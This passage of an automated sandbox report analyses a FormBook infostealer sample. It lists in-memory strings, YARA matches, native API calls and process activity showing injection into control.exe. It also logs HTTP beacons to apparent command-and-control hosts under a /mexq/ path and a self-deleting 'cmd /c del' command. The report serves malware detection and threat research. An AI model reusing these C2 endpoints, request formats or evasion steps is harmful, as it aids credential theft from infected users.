            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/__media__/design/underconstructionnotice.php?d=vintagepaseo.com
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/__media__/js/trademark.php?d=vintagepaseo.com&type=ns
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/display.cfm
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxv
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnava
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?8518669f0d31e41508be0babf5a8fc28
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
            Source: unknownDNS traffic detected: queries for: www.iphone13promax.design
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5 HTTP/1.1Host: www.vintagepaseo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5 HTTP/1.1Host: www.xn--aprendes-espaol-brb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5 HTTP/1.1Host: www.cyebang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: iAuPyHuUkk.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_01A4D064
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_01A4F288
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_01A4F298
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00401030
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041C9C7
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041D1BF
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041BA6C
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041C2A5
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00408C90
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00402D87
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00402D90
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041C7E1
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00402FB0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAB090
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA841F
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51002
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C61D55
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B90D20
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB4120
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9F900
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB6E30
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCEBB0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CD1BF
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CC9C7
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009B8C90
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009B2D90
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009B2D87
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009B2FB0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004185F0 NtCreateFile,
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004186A0 NtReadFile,
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00418720 NtClose,
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004187D0 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004185EB NtCreateFile,
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041869A NtReadFile,
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041871C NtClose,
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004187CA NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C85F0 NtCreateFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C86A0 NtReadFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C87D0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C8720 NtClose,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C85EB NtCreateFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C869A NtReadFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C87CA NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C871C NtClose,
            Source: iAuPyHuUkk.exeBinary or memory string: OriginalFilename vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000000.00000000.348390007.0000000000F02000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDictionaryEnumerat.exe6 vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000000.00000002.375787756.0000000008280000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exeBinary or memory string: OriginalFilename vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000003.00000000.367675277.0000000000BC2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDictionaryEnumerat.exe6 vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000003.00000002.456333138.0000000003635000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exeBinary or memory string: OriginalFilenameDictionaryEnumerat.exe6 vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: iAuPyHuUkk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: iAuPyHuUkk.exeReversingLabs: Detection: 15%
            Source: iAuPyHuUkk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\iAuPyHuUkk.exe 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess created: C:\Users\user\Desktop\iAuPyHuUkk.exe C:\Users\user\Desktop\iAuPyHuUkk.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
            Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess created: C:\Users\user\Desktop\iAuPyHuUkk.exe C:\Users\user\Desktop\iAuPyHuUkk.exe
            Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeFile created: C:\Users\user\AppData\Local\GottschalksJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@8/3
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: iAuPyHuUkk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: iAuPyHuUkk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe, 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp
            Source: Binary string: control.pdb source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdb source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe
            Source: Binary string: control.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: iAuPyHuUkk.exe, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.iAuPyHuUkk.exe.f00000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.iAuPyHuUkk.exe.f00000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
